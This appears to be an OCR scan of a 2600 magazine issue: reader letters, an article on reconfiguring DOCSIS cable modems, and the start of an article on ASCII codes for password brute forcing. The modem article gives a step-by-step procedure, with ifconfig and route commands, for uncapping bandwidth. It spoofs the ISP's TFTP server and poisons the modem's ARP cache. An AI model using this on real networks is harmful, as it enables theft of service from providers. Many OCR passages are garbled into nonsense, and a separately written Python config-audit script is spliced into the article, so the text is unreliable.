believe tools and technology that directly foster communication,
education, and the furtherance of free
speech should be made as widely available as possible.
This has always been our position. One simply
cannot think of tools with obviously lethal functions in
the same way, however. To do so is the height of irresponsibility.


Dear 2600: 

In 18:3, I was reading your response to a Canadian
on page 31-32, and you guys mentioned something
about the Canadian election system awarding the winner
to the person who received the most votes. This is
probably a good thing. However, the Electoral College
in the U.S. does serve a purpose, and that is to make it
harder for the states that are more populated to wield
power over the states with lesser population, thus making
it harder for a presidential candidate to win the office
of President. Now, I do not think that Dubya
should have won the presidency (I voted for Ralph
Nader, and nearly persuaded my mother to do so on the
way to the voting booth), but abolishing the Electoral
College would give much more power to the East and
West Coast (for better or worse), and make it that
much easier for the majority to force their will on the
minority. This is something the Framers made especially
hard to do, and for a very good reason (i.e., slavery).
I would like to know why you would have the
Electoral College abolished.





Jon McLaughlin 

If imposing the will of the majority over the minority
is such a threat, why don't we see systems like the
Electoral College put into place for other elections
and referendums? We're certain that we could find angry
people in sparsely populated regions of every state
who feel the people in the cities unduly influenced
races for governor, senators, representatives, etc.

Should we vive these people more pow because there 





are less of them rds this not ju Jjustana of affir- 

mative action whieh Mises more hara than good? Bi 
for minority candidates. The person who you and
many others wound up voting for got, according to the 
Electoral College, a total of zero votes. Does that seem 
even remotely close to fair? 


Dear 2600: 

I noticed in your response in 18:3 to the letter under
the heading "Guns," you wrote "...oppression from
the most powerful government in the history of
mankind." I just wanted to correct you. The most powerful
government in the history of mankind in terms of
power was probably ancient Rome and, as far as size 
and possibly even power, the British Empire. 

Joseph McLeod 

This will quickly devolve into semantics so let's define
our terms: By "most powerful" we mean most capable
of having a direct influence over all other parts
of the world in a very decisive way, both militarily and
legislatively. It's a frightening concept regardless of
where you stand politically.


Dear 2600: 

You do Mr. Conterio a grave injustice in your let- 
ters page (15.4). His arguments are the voice of reason 
- surely! 

Look at it like this: there's only so much gun crime 
in the USA because the criminals can get guns easily. 
And as Mr. Conterio points out, you usually only have 
to show a gun to deter a crime. Naturally, it has to be a 
bigger gun than the criminal has. 

So the solution is simple. Encourage everyone to
get a bigger gun than the average criminal and carry it
with them at all times. This does leave the poorer sections
of society more vulnerable (being unable to buy a
big gun), but this is all to the good as it means the
criminals will target them, instead of respectable, law-abiding
citizens (with money).

But I wouldn't stop there! Who is to say that adults
have more of a right to life than children? And having 
seen the reports on atrocities in high schools over re- 
cent years, is it not reasonable to campaign for chil- 
dren to be able to defend themselves? Of course they 
should! "Guns In Schools" can be the campaign slo- 
gan. With proper training (it should be a required sub- 
ject), most children are every bit as capable and 
responsible as an average adult to own and use a gun 
(well, an average adult after a beer or two, anyway). 

I mean, if somebody went into a school with a machine
that could launch baseball bats faster than the
speed of sound at the rate of one hundred per minute, 
would you ban baseball bats? 

I think my point is abundantly clear, and I trust I
mae pyp ka support in this matter.

ed ı fi ipads copy of Grand Theft Auto
on: Xang he informed me that a guy on
lo stafións.proclalmed "Free Kevin!" 50
for Poo eter da cay When I played I would set the radio
station to "Chat box" and after a while I finally
heard it. It was kind of pleasing to hear the message on
such a popular video game. Then when I was looking
through the booklet for the game, I noticed they listed
guests for "Chatterbox" in the back. So I read through
and noticed the name "Bernie S." Very nice.

noire 


Dear 2600: 

Hey guys, great issue. I was walking out of Barnes 
and Noble at dusk with the magazine (18:3) in my 
hand looking at the cover. As I crossed under a light 
the glare revealed the secret item! The peace sign, I 
love it. Always keeping us on our toes. Thanks guys.

Gustaf 


Dear 2600: 

I was signed into MSN Messenger on January 10th 
at 11:10 Eastern Time, and I got a "Maintenence Alert" 
dialog box telling me that MSN will go down in five 
minutes for maintenance. If this happened to everyone, 
then there is obviously some way that you can call a 
dialog box on the machine of everyone who is signed 
into MSN at the moment. It kind of makes you wonder 
what kind of other events they might be able to initiate. 
If anyone had a packet sniffer running and caught this, 
or if you have more information on how this may 
work, please let us know. 

psykOmantis 


Dear 2600: 

I recently moved into a cheap three-story apartment
building. One day I got curious and started to
take the faceplates off the wall. Behind where my
phone line came in I discovered not just one wire, but
three! Upon further investigation I found that one was
for my apartment, with the two others providing dial
tone to the floor below me and the floor below them!
Think about how easy it would be to tap into the line. I
found a similar configuration for the cable television
lines. Do you have a phreak for your upstairs neighbor?
Are you sure?

bluness 

More proof of how insecure phone lines really are. 

This is very unlikely to ever change. 


Dear 2600: 

I was watching the other day (again) the movie 
Hackers and something caught my eye on the desk 
where Kate "Acid Burn" Libby is preparing for her 
“battle” with fellow hacker Dade "Zero Cool/Crash 
Override” Murphy. That is a copy of the magazine 
2600. I wonder how many others caught this.

Herman 
Another appearance occurs when the federal
agent is dela "The Hacker Manifesto" in the Car
y of our i a Tenian
r lan
e oni
newsletter so they just revised history a bit. Also, check
out the subway car scene as well as the wall in Phantom
Phreak's room. Those are original yellow HOPE
bumper stickers from 1994, now worth many thousands
on E-bay.


Dear 2600: 
I have read before how someone used "safeweb" to
get around school or public firewalls but the problem
is sites like those are always blocked. But the one thing
they can never block are translator web sites, like Alta
Vista. All you have to do is enter the URL and change
the language from "whatever" to English. Let's say
you select German to English ih go through,
change all the German words t ali di: age
English words, and bam! You are at: me = MM:

We suggest using Chinese to English since there
are enough German words with the same apang as
if you try to ricas ' from 0) E J i ; E Horg. A e


Dear 2600:
Just wanted to let you guys know you're gine
some free advertising. I was reading this humorous Final
Fantasy parody when I came across this page
showing a character reading 2600 at
http://www.nuklearpower.com/comic-/058.htm. I hope I'm not getting
the author of the comic in any trouble. (No, I'm not
him.)
DephKon1


Dear 2600:
I wish this letter had more point to it, but it really
doesn't. In the sentence in your Marketplace section of
18:3 and 18:4 (I'd presume more of them) under the
heading "Only subscribers can advertise in 2600!" you
will notice near the end of the paragraph it says, "Include
your address label or a photocopy so we know
you're a subscriber. Send your ad to 2600 Marketplace,
PO Box 99, Middle Island, NY 11953. Include
your address label or photocopy."
Otherwise, I love the publication. Keep up the
good work. The hidden "peace" symbol in 18:3 was really
neat and I never noticed it until others pointed it
out. Later,

Well, we never noticed this repeating ph
you pointed it out so thanks. It's the end of a 1
that's been occurring since Spring 1998.


Dear 2600:
In addition to the article I wrote on Black Ice for
the 18:4 issue of 2600, I would like to mention that ISS
has released a patch for users with Windows XP and
2K. There is a hole that will allow "hackers" to execute
computer jacking and crashing. Normal stuff. Just
thought I should put that out there since it was not in
the original write up.
Suicidal


Dear 2600:
On the Rat Race DVD, as an extra, the producer
and director do candid calls to the actors in the film.
They apparently didn't know that the touch tones
recorded in the conversations can be used to call the
actors!
As a friend of mine put it, "Hey, I got your phone
number off of the DVD... you should have bought a
squirrel!"
Phookadude
A reference lost on anyone who hasn't seen the
film. We imagine some actors wound up having to
change their numbers after this rather stupid oversight.

capo in "Phrack," no


Dear 2600:
We enjoy wearing brown pants and sniffing your
magazine on ad ieti evenings while composing

And this is as strangely haunting as a David Lynch
film.


Dear 2600:
I was in a ie ne in i sacrant, California
that I know carries your periodical and I decided to
check to see if I had your current issue. I was surprised
to see a fairly large stack of your magazine hiding behind
an issue of something or other. Needless to say, I
already had that issue so I moved the magazine to uncover
it for other customers. I came to the conclusion
that it was intentionally covered when I returned a
week or so later to discover the same situation. I don't
know if an employee was doing this or someone else
with a strange hobby, but either way I think it's a terrible
way to sell magazines. Perhaps you at 2600 should
start printing on excessively large paper to increase
visibility. I plan to make it a routine to stop at that
bookstore to make sure you are kept visible to shoppers.
You're probably thinking why don't I tell the
shopkeepers? Well, it just ain't my style.
TheDude
We appreciate all of our readers who look out for
this sort of thing. Most of the time the people who hide
our magazines aren't affiliated with the stores. We simply
have a lot of enemies who don't want our views to
be heard. Consider it an attack on all of us.


In response to "Consequences" published in 18:3, I
am not sure that everyone is aware of how bad things
have gotten. I think it is horrible that Sklyarov was arrested
for violating the DMCA when what was being
done promoted the sale of more eBooks. There are
many injustices that have been done to many good
people. As far as I know, I am the first person to be arrested
for performing a port scan in the process of protecting
a 911 system I was put in charge of. A simple
port scan now seems to be an offense that one can be
arrested for. While I have been successful at defending
myself so far, it is still something that most computer
people don't realize the rest of the world doesn't understand
and which therefore must be illegal. Several
articles have been written on my case, one by Bill
Reilly, who is working on the Elcomsoft (Dmitry Sklyarov's
employer) case. It can be seen at
http://www. onlinesecurity. epee may Se d
etail-phparticle_sd=2 firs
fend a case of this J vos Puan tell you. il is
cult task to unde: fake and fdon't wish it
The devastation to business 2
account is tremendóusañ
people understand what is involved. I thank your magazine
for doing a great job on promoting rights and
telling some of these stories so that the people know
what is going on.

Scott Moulton 

System Specialist and Software Engineer 


Dear 2600: 
I was working at Bridgestone Firestone Information
Services during the recall, so I was already bitter.
The lawsuit against 2600 is too much... doubt I'll ever
drive a Ford again.
Found On Road Dead, cute huh?
ht 


Dear 2600: 

So I'm out in Omaha visiting my girlfriend over
the Christmas break. Just before I left I grabbed a 2600
at B&N to read on the flight home. I flew into Chicago
and had to switch planes.

Whenever I fly I ask to sit in emergency exit rows
in order to get more leg room. Before takeoff, the flight
attendant stopped by to make sure that I would agree
to perform emergency tasks if needed. I told her it was
no problem and continued reading my magazine.

I was into reading an article when I finally realized
that we hadn't left the terminal yet. I looked up and a
man had come onto the plane from the terminal. I
watched him as he came up to me and said, "Sir, I need
you to step off the plane, please bring your things."

Confused, I stood up and walked off the plane.
Once on the sky-bridge, they informed me that I was
going to be "screened" again. Before they started I
asked why, and they replied, "the flight attendant said
you were reading a terrorist pamphlet." I was confused
at first and then explained to them that it was a magazine
about "computers and electronics." They then
asked if they could look at it and had to OK it with the
pilots before I was allowed back on the plane. Oh
yeah, I had to be "screened" again as well.

My guess is that she saw the article about "vulnerabilities"
in "Passport" (regarding the article on Microsoft's
new .Net Passport stuff).

I understand that with all of the recent events that
people are more concerned about security, but I think
there is a place where we need to draw the line. Causing
a flight to be delayed for more than an hour over
my reading a magazine is not acceptable.
Anthony D. Bower 
Please write back to us (paper mail will get a hu- 
man's attention a lot faster) with as much specific in- 
formation on this as possible. When such events occur, 
we need to know exactly who is responsible so they can 
be dealt with as severely as possible. The idea that you 
can be taken off a plane because some dimwit doesn't 
understand your reading material should be considered
an affront to every freethinking person alive.


Dear 2600: 

I can't believe it! Absolutely outrageous! Rogers
has really pissed me off this time! I called Rogers' tech
support for their cable Internet and I found out that you
aren't allowed to run webservers while you are connected
via Rogers Cable. If you do, then apparently
you will be found out and they will come and take
your cable modem away. Geez, all I wanted to do was
run a puny little game server for Unreal Tournament.
Their tech support guy told me that they scan all of
their Rogers Cable customers for web servers. I think
that this is stupid. Why would Rogers do that? Is there
any way to circumvent the scans, so that my Unreal
Tournament server dream can become a reality?
Johnny Slash
Internet access via a cable modem is not true Internet
access. It's primarily meant for outgoing traffic,
not incoming, such as you would be getting on a web
server. This is yet another reason to support your local
Internet Service Provider who will generally not get in
your way as to how you choose to use the net.


Dear 2600: 
Recently I received a chain letter in my inbox. The
chain letter had a boring poem about two friends who
are too busy in life to speak to each other. When one finally
decides to visit the other, he turned out to be dead
from old age. What this has to do with a chain letter
aside from conveying a moral of no use, I can't determine.
The letter had a standard set of instructions.
Send this letter to a dozen or so people within three
hours of reading or suffer incredible bad luck.

I dug up all the e-mail addresses listed in the e-mail
and replied back to them. I quoted Robert Frost,
"The Road Less Traveled," and told them all to take
the road less traveled and not forward the chain letter
on to a dozen other people to venture on into an endless
tree of useless e-mail.

To my surprise, I received several replies from
people who could not determine how I knew their e-mail
addresses, even though the e-mail I sent to them
had the original chain letter within the body. Apparently,
I pissed off a bunch of people making them feel
foolish for sending the message to their friends. If you
consider it, it's thinking only about yourself that drives
you to ship off an e-mail to all your friends so they can
take on the burden of bad luck if they don't spam others
within three hours of reading.

To make a long story short, I was supposedly reported
to some Internet security agencies and told I
wasn't aware of the repercussions of my actions.

Tell me I don't have the right to free speech.
"Nicolai... you don't have the right to free speech." 
There we have it. 

Nicolai 


Dear 2600: 

I just wanted to write a quick letter to you guys
telling you that I e-mailed Ford informing them that I
was boycotting (and encouraging everyone I knew to
boycott) them due to the legal actions they were taking
against 2600. I told them that freedom of speech is
probably the most important freedom we have as
Americans and that I could not accept them taking legal
actions to prevent said freedom. Thanks for the
great magazine and website, guys. If you keep writing,
I'll keep reading.

Sunfist 


Dear 2600: 
Why is it that those in power are so afraid of people
who they see as a threat to that lui TT nmenrolled
in a Business Technology course at my high school.
It's sold as some super advanced course, but I personally
find it to be a little below my level, so I find myself
spending most of my time helping the instructor
with little projects on the side. A few weeks ago we replaced
his school-owned piece of shit computer with a
rather nice Pentium I machine we built ourselves. In 
order to connect to the school network however, we re- 
quired a couple of programs which the system admins 
refuse to give out. Namely Novell Client software and 
some program the teachers use to do attendance and 
gradebooks called STI. After several work orders were 
filed in an attempt to get someone from the tech de- 
partment to come and take care of this issue for us - 
each of which was simply ignored - we decided to take 
matters into our own hands. After a couple of hours 
spent scrolling through every directory on every net- 
work drive on the school server (access to which his 
“teacher access” provided - no hacking was required), 
I managed to find copies of both programs needed. We 
downloaded the software and got our system up and 
running. Yesterday he was called into a meeting with
the Superintendent of Schools and accused of using his 
class to train hackers. He is now teaching a restricted 
curriculum. They tell him quite specifically what he 
can and can’t teach. Myself and a few other students 
who had absolutely nothing to do with the alleged attacks
now have our computer privileges closely scrutinized.
We also have reason to believe that certain
individuals in the upper levels of the admin hierarchy
have been sabotaging our equipment. Ultimately what
it comes down to is this: the school tech department 
sees myself and a few other students as a free source of 
labor which the school board can tap to do their jobs. 
This threatens their paycheck, so we're on the shit list.
I have three months to go until I graduate high school
and get rid of all this bullshit once and for all. I'm biting
my tongue and resisting the urge to do some real
damage. Why is it that people in power seem to go out 
of their way to threaten, anger, and ultimately push 
perfectly legitimate hackers to do the kind of things 
that give us a bad rep? I'd have to say that not wanting 
to restrict future generations even further is the only
reason I haven't done such things yet. Just three more 
months. 
Ghent 
Even if you were the last class of seniors in your
high school, destruction wouldn't be the answer. Nothing
would make the morons who antagonize you happier.
What's important is for you to reveal their
stupidity in ways that non-technical people can understand.
You've indicated that there is a paper trail
which would prove that you attempted to get help from
the tech department and that they ignored you. Assuming
you didn't violate any software licenses in doing
what you did, it should be a snap to prove that you did
nothing wrong. There's no reason why you can't (or
shouldn't) continue to help with this after you're gone.


Dear 2600:

I was pretty disgusted when a friend of mine told
me about a new kids' show that his kids were watching.
It's called Cyberchase and the URL is at:
http://pbskids.org/cyberchase/meet_hacker.html.

He said, "I haven't seen more than two minutes of
it, but the gist of the show is that hackers are bad. In
fact, my kids now call each other "hacker" as a put-down."

They are planting seeds I tell ya. I like PBS but after
seeing this, I'm going to write a short note to the
pbskids.org site (unless you have a better contact), just
to let them know how I feel about this 'toon.

Just thought I'd pass along this info. Maybe others
might want to rethink donations or write a (nice) short
note.

johnnyfulcrum 
It's essential that people express their feelings
about this since it's a really unfair characterization.
Contact your local PBS station as well as PBS, the
Corporation for Public Broadcasting, and the National
Science Foundation, all of whom provide funding.
It's bad enough to have the evil character be a
hacker but for his actual name to be Hacker is a bit
much.


Dear 2600: 

I had nothing to do last Monday so I went to a lecture
given by Janet Reno at my college. I was bored,
and I thought that she might have something intelligent
to say. After announcing that she was running for
governor in Florida and an unconvincing tirade about 
how we need to "shake up the government system," 
Reno stated that "we need to protect our young chil- 
dren from the hackers that try to seduce them in chat 
rooms and prevent hackers living in other countries 
from stealing funds from America's banking institutions."
After this broad generalization, I was pissed
and wrote a question on the paper provided by the 
proctor of the assembly. After a slew of questions 
about health care, the legal system, and even a ques- 
tion about whether Jeb Bush was more intelligent than 
George W. Bush, she neglected to answer "Why are 
hackers still being criminally prosecuted for pointing 
out blatant and potentially dangerous security holes in 
government and business computer networks?" I guess
our nation's politicians are still unable or unwilling to 
tackle the injustice in our society. 

Polar Mike 

She probably watched an episode of "Cyberchase"
right before giving that speech. Children's cartoons
are popular with politicians and it explains the level of
their intellect. It would be a good idea to keep track of
all the stupid things they say about hackers.


Dear 2600: 

As I am sure you know, the goddamned SSSCA is
still being bandied about. This is basically the complete
bending over of customers by the RIAA, MPAA,
and other lobbying groups. Because Congress is here
to represent business, right? This country was started
on the premise "We hold these truths to be self evident:
every corporation has the right to as much profit as
possible, regardless of the rights, health, or well being
of the citizens of these United States," right?

Here is a ssp website that is vob to pe by














by Pankaj Arora
pankajarora@paware.com

An interesting aspect of cable modem technology
is the evolution and senda
(DOC e Cab Se :

The focus of this piece is the way
ISPs configure DOCSIS-compliant cable
modems and is constructed in a fashion that educates
the reader on how a cable modem user
could potentially configure their own device.
Take very important note, reconfiguring and/or
tampering with your cable modem not only most
likely breaks your terms of service agreement but
could potentially be found illegal in most jurisdictions
and would then be punishable by law. If
you wish to experiment, prior permission from
your cable modem service provider would most
certainly be necessary. I urge you to educate
yourself through this writing but not to break the
rules, and I urge cable modem service providers
to use the information contained in this article to
help better protect their service. I have a cable
modem myself and I respect my cable company
and the law - but I also highly value free speech
and learning.

This article makes the assumption that the 
reader has prior TCP/IP, networking, and Linux 
knowledge (although this can theoretically be 
done on plenty of other OSes). There are certain 
exceptions to the content of this article and claims 
are based on a generalization of the DOCSIS- 
compliant cable modems that exist on the market 
today as well as my own testing - and the work of 
others. 

How does an ISP configure DOCSIS-compliant
cable modems? To answer that, one should
first take notice of the interfaces on a cable modem.
One interface connects to the coaxial cable
itself. This is the HFC interface. Another is traditionally
either Ethernet or USB (or both in some
models) which is used to connect the cable modem
to the customer's computer (or other network
device). This is the CPE interface. As you may already
know, the device we connect the cable modem
to will have a hard-coded (but still
"spoofable") MAC address which will be accompanied
by an IP address which is either static or
dynamically assigned by the ISP and of course
handled in software.






However, a few things most people may not
know are: (1) The cable modem itself has a hard-coded
MAC address and an IP address on the HFC interface
and (2) The cable modem itself has another IP
address on the CPE interface. Generally this IP
address is 192.168.100.1.

When you turn your cable modem on, it uses a
primitive TCP/IP stack and DHCP client to request
an IP address for the HFC interface. With
some ISPs the IP address it will receive will be a
10.x.x.x address. Additionally, upon receiving the
IP address for the HFC interface, it may also receive
the IP address for the ISP's Trivial File
Transfer Protocol (TFTP) server. Upon the modem
obtaining the IP address for the TFTP server
it will connect to the server, download a configuration
file, and use that to set up such things as
downstream and upstream bandwidth caps. It's a
rather simple process that usually doesn't take
more than a minute.

How would one hypothetically configure a cable
modem? To configure a cable modem, the first
thing one would have to do is obtain the IP ad- 
dress of the ISP's TFTP server. For some it may 
actually be the same as the ISP's DHCP server. To 
find the address one could look at the information 
provided by the cable modem’s mini web server 
(which exists on some modems such as certain 
Motorola SurfBoard models and can be accessed 
via the Ethernet/USB interface IP address, e.g. 
192.168.100.1, using a standard web browser). 
Conversely, if that option isn't available or if the 
TFTP server information isn't given via the web 
server, then one could possibly use an SNMP 
client to scan the modem for that same information.

Using this same process(es), one would also 
need to obtain the name of the DOCSIS configu- 
ration file the modem downloads since TFTP 
doesn't allow you to list directories and thus a 
specific filename must be known to be able to 
download the configuration file. Once you find
that out, the next steps are to use a TFTP client to
download the configuration file off the ISP's
TFTP server and to use a DOCSIS utility to decode
the file into a readable text format. Once you
decode the configuration file, it will look something
like this:

Main {
    NetworkAccess 1;
    ClassOfService {
        ClassID 1;
        MaxRateDown 1544000;
        MaxRateUp 128000;
        PriorityUp 0;
        GuaranteedUp 0;
        MaxBurstUp 0;
        PrivacyEnable 0;
    }
    MaxCPE 3;
    /* EndOfDataMarker */
}


One could theoretically adjust the settings to 
his or her own preference. For example, setting 
MaxRateUp to 0 would remove any upstream cap 
that may exist on the cable modem's end and set- 
ting MaxRateDown to 0 would do the same for 
downstream. After any changes are made, the file 
can be re-encoded using a DOCSIS utility. Again, 
let me stress to you, know the rules and follow 
them. This information is provided for under- 
standing and was not produced with the intent of 
fostering and/or promoting illegal activities. Be 
smart and keep it legal, but at the same time don't
be afraid to learn about this technology. 
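
For the service providers the article addresses, the same decoded layout can be checked mechanically. The following is an added example, not code from the article or from any DOCSIS utility: a Python parser for the decoded text form shown above, with an audit that flags rate caps of 0, rates above the provisioned tier, and a MaxCPE above the allowed count. PROVISIONED_TIER, the function names and the defaults for missing keys are assumptions made for the illustration.

```python
import re

# Constructed sample: the decoded text form shown in the article.
SAMPLE_CONFIG = """\
Main {
    NetworkAccess 1;
    ClassOfService {
        ClassID 1;
        MaxRateDown 1544000;
        MaxRateUp 128000;
        PriorityUp 0;
        GuaranteedUp 0;
        MaxBurstUp 0;
        PrivacyEnable 0;
    }
    MaxCPE 3;
    /* EndOfDataMarker */
}
"""

# Assumed service tier the subscriber is provisioned for (hypothetical policy).
PROVISIONED_TIER = {"down": 1544000, "up": 128000, "max_cpe": 3}

# A token is a /* comment */, one of { } ;, or a run of other characters.
_TOKEN = re.compile(r"/\*.*?\*/|[{};]|[^\s{};]+", re.S)


def tokenize(text):
    """Split the decoded text into tokens, dropping comments."""
    return [t for t in _TOKEN.findall(text) if not t.startswith("/*")]


def _parse_block(tokens, pos):
    """Parse statements up to the matching '}'; return (dict, next position)."""
    block = {}
    while pos < len(tokens):
        name = tokens[pos]
        if name == "}":
            return block, pos + 1
        if name in ("{", ";"):
            raise ValueError(f"unexpected {name!r} at token {pos}")
        if pos + 1 < len(tokens) and tokens[pos + 1] == "{":
            # Nested block; a name such as ClassOfService may repeat.
            child, pos = _parse_block(tokens, pos + 2)
            block.setdefault(name, []).append(child)
        else:
            end = tokens.index(";", pos)  # ValueError if the ';' is missing
            values = tokens[pos + 1:end]
            if "{" in values or "}" in values:
                raise ValueError(f"missing ';' after {name}")
            block[name] = " ".join(values)
            pos = end + 1
    raise ValueError("unterminated block: missing '}'")


def parse_config(text):
    """Return the Main block as a dict; nested blocks are lists of dicts."""
    tokens = tokenize(text)
    if tokens[:2] != ["Main", "{"]:
        raise ValueError("expected the file to start with 'Main {'")
    block, pos = _parse_block(tokens, 2)
    if pos != len(tokens):
        raise ValueError("unexpected text after the Main block")
    return block


def audit(cfg, tier):
    """List the settings that fall outside the provisioned tier."""
    findings = []
    classes = cfg.get("ClassOfService", [])
    if not classes:
        findings.append("no ClassOfService block: no rate limits defined")
    for cos in classes:
        cid = cos.get("ClassID", "?")
        for key, limit in (("MaxRateDown", tier["down"]),
                           ("MaxRateUp", tier["up"])):
            # Per the article, 0 means no cap; a missing key is treated
            # the same way here (assumption).
            rate = int(cos.get(key, "0"))
            if rate == 0:
                findings.append(f"class {cid}: {key} is 0 (no cap)")
            elif rate > limit:
                findings.append(f"class {cid}: {key} {rate} exceeds {limit}")
        # Reported so an operator can confirm that running this class
        # without Baseline Privacy (DOCSIS link encryption) is intended.
        if cos.get("PrivacyEnable", "0") == "0":
            findings.append(f"class {cid}: PrivacyEnable is 0")
    max_cpe = int(cfg.get("MaxCPE", "1"))  # assumed default of 1 when absent
    if max_cpe > tier["max_cpe"]:
        findings.append(f"MaxCPE {max_cpe} exceeds {tier['max_cpe']}")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_config(SAMPLE_CONFIG), PROVISIONED_TIER):
        print(finding)
```

Run against the settings a modem actually reports, any finding other than the ones the provider's own file produces points at a device that did not load the provider's configuration.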

How would one apply the configuration them- 
selves? The next steps involve running both a 
TFTP server and a time server (since many cable 
modems time-stamp log entries those modems 
make) on the computer/device that is connected 
to the cable modem [CPE interface]. The process 
is rather straightforward: 

1) Place the configuration file in the root directory
of the TFTP server making sure you use
the exact same file name your ISP uses.

2) Depending on what OS you use you may
want to create an entry in your HOSTS file for the
modem's CPE IP address (since DNS will not be
available when the cable modem is connecting to
the TFTP server and things such as the standard
Linux inetd service do not like the lack of DNS
availability when resolving hostnames - most
Linux distributions have the HOSTS file at:
/etc/hosts).

3) Create an alias IP address on the interface
your cable modem is connected to. As you may
have guessed, the alias IP address needs to be the
IP address of the TFTP server as you are going to
be doing a little spoofing. Depending on your OS,
this can be done in a variety of ways. Under
Linux, with IP Aliasing installed in the kernel,
one could simply issue the following command:
ifconfig eth0:1 <tftp server> netmask
255.255.255.255. Replace <tftp server> with the
IP address of your ISP's TFTP server of course. If
you don't have IP Aliasing built into the kernel or
otherwise generally available you could just theoretically
change your IP address to that of the
TFTP server for the time being. You will want to
ensure you set the netmask to 255.255.255.255 to
avoid unwanted network routes which could
cause problems.

4) The next step is to create a static route to 
your cable modem to ensure you are coming from 
the spoofed address. Under Linux one could issue 
the command: route add -host <cpe interface ip 
address> gw <tftp server> again replacing that 
which is in brackets with the proper values. 

5) Once all the preceding setup is complete, 
one would start their TFTP and time server with 
everything in place and start pinging the cable 
modem's CPE IP address and then, while that is
occurring, reset the cable modem (or unplug it for 
a few moments and plug it back in). 

If you were able to get this far and you set 
everything up right, chances are the cable modem 
will download the configuration file from you.
Once this is complete the aliased address can be 
deleted or the IP address can be set back to DHCP 
or the static address given by your ISP. Addition- 
ally, you can stop pinging. You can verify this 
works via an SNMP query on the CPE interface 
or by just testing the results of any changes made. 

Back up! How does this all make sense? The
setup is similar to that of how it is set up on an
ISP's end, for the most part. The pinging of the
cable modem's CPE interface "poisons" the ARP
cache of the cable modem and the resetting of the
modem flushes the cache so the ISP's TFTP
server MAC address (the real one) is flushed out.
This process essentially makes the cable modem
believe the MAC address of the TFTP server is
yours instead of that which belongs to the ISP's
TFTP server which - as far as the cable modem is
concerned - makes you the TFTP server it wants.
So when it's ready, it will connect to your box and
get your configuration file. If you have a detailed
enough understanding of TCP/IP this should
make sense. If not it's okay, there are plenty of resources
available to learn more of the fundamentals.
There are many potential barriers an ISP may
and should put in place to prevent this procedure 
from working. Additionally, some cable modems 
don't allow you to ping the CPE interface until it 
obtains the TFTP configuration file, which would 
essentially prevent the spoofing from working as 
it will cache the correct MAC address before you 
can deliver it the wrong one by pinging it. How- 
ever, for the most part this process tends to work - 
at least for now. 

I hope this article extended your understand- 
ing of how cable modems work and are config- 
ured - the utilities, servers, and services 
mentioned in this article are readily available on 
the web for numerous platforms.


by hairball
hairball@iilgotten.net

In the course of a computer security professional's everyday web surfing, we can't help but come
across several programs that can do interesting things with passwords. From the everyday Unix/Linux
password cracker to the Windows brute forcing programs strewn all over the Internet, I see the same single
problem that seems to envelop most of them. Many read from a password list instead of generating
the passwords as they go. While this makes perfect sense when used with "most common passwords"
lists and all, when it comes to brute force this is very impractical due to the large number of possible
password combinations. Let's do a little investigation.

As many of you probably already know, the ASCII character set contains a total of 256 unique
characters. Remember that a byte is eight bits, and that a bit is a one or a zero. Therefore, in the range
00000000-11111111, only 256 possibilities exist. So every file in existence can only contain
combinations of these 256 characters and nothing more. Numbered 0-255, each character possible has its own
ASCII code. The first 32 codes (0-31), when it comes to text files, are control codes. These codes, which
date back to MS-DOS 1.0, are passed from program to program to perform certain functions. For
example, code 7 is the "bell tone" code. This is the code that causes your computer to send the motherboard the
command to make your onboard PC speaker beep. On a PC compatible system, entering a raw ASCII
command is as simple as holding down the ALT key and entering its code on the numerical keypad (not
the one above the letters).

Here's a simple example: 

1) Open a DOS window (C:\COMMAND.COM on most versions of Windows/DOS).

2) At the command prompt, enter "ECHO", and a space.

3) Now, hold down the ALT key, and press 7 on the numerical keypad.

4) Release the ALT key.

5) Your screen should say something similar to "C:\>ECHO ^G."

6) Now, press the enter key. 

Since the DOS command "ECHO" tells your computer to spit back at you what you just entered, it
will display the control character on your screen. But the code you just entered is not a visible character;
it is the bell tone code. Instead of "^G" being proudly displayed, one of two things will happen.
Depending on your system configuration, either your PC speaker will beep (sometimes it will just click on cheap
motherboards), or Windows will play the "default beep" sound file that's programmed in the system
settings. In the latter case, Windows simply intercepts the motherboard's beep command and interprets it
internally.

Other control characters include "backspace" (8), "linefeed" (10), and "character return" (13). Each of
the ASCII control characters also has a simple keyboard command, such as "break" (3) which is
CTRL+C. Notice how the above bell tone example displayed ^G on the screen? This is because ALT+7
and CTRL+G are the same ASCII command character. This is how functions such as CTRL+C (copy)
and CTRL+V (paste) work in Windows.

Here's a simple example: 

7) Open a DOS window (again). 

8) At the command prompt, enter "DIR", the DOS command to list the files in the current directory. 
9) Now, hold down the ALT key, and press 13 on the numerical keypad. 

10) Release the ALT key.

11) Notice that the directory was displayed. This is because ALT+13 is the same as enter. 

12) Now, try it again by entering "DIR" at the prompt again. 

13) This time, instead of ALT+13, use CTRL+M.

14) Notice the same thing happens, because CTRL+M is the same as ALT+13. 

ASCII codes 32-126 are where the common keys are: A-Z, a-z, 0-9, plus all the symbols keys, space,
and whatnot. 99.9 percent of the time a system password will consist of nothing but these characters.

ASCII codes 127-255 are the "extended" characters. These codes are characters with accent marks,
idad de characters, and other such novelties. These characters are interpreted differently in DOS and
Windows environments, and cause a lot of compatibility issues. For this reason, they are mostly not well
understood by the Windows generation. At a DOS window, try ALT+ 176, 177, 178, 219. These are
shading effects used in old school DOS programs. Also, check out the border drawing set, ALT+ (179-222).
If you have ever seen a DOS program that draws a border around itself without any graphical modes, this
is how it does it.

Unix and Linux, because of the nature of the OS itself, can handle passwords made up of almost any
combination of almost any of the 256 characters. Unfortunately, password files simply cannot contain all
of this. The only characters that I know of that can't be used in a Unix/Linux password are code 0 and 13.
Remember from the above example that 13 is the same as enter. So how would a password be able to
contain an enter as a character? It can't. Code 0 is NULL, and entering nothing is nothing. Linux
passwords can, however, contain the linefeed character. This is where Windows has some trouble. In
Windows, both a linefeed and carriage return are needed to end a line in a text file. But in Unix/Linux, they
both perform a different function.


A linefeed is a control character that says, "Go to the next line." A carriage return is a control
character that says, "Go to the beginning of the line." So in a normal Windows/DOS text file, each line ends
with both a linefeed and a carriage return. Here's an example.

What your computer sees:

Joe is COOL.[CR][LF]He likes Cheese Pizza![CR][LF]DMCA Sucks.

What you see:

Joe is COOL.
He likes Cheese Pizza!
DMCA Sucks.

Your computer displays the first part, "Joe is COOL." It hits the carriage return code and puts the
cursor back at the beginning of the line - at the J in Joe. Then it hits the linefeed character and takes the
cursor down one spot, right below the J in Joe, which is the beginning of the next line. It continues
displaying the next line, "He likes Cheese Pizza!" until it hits the CR and LF again and repeats the
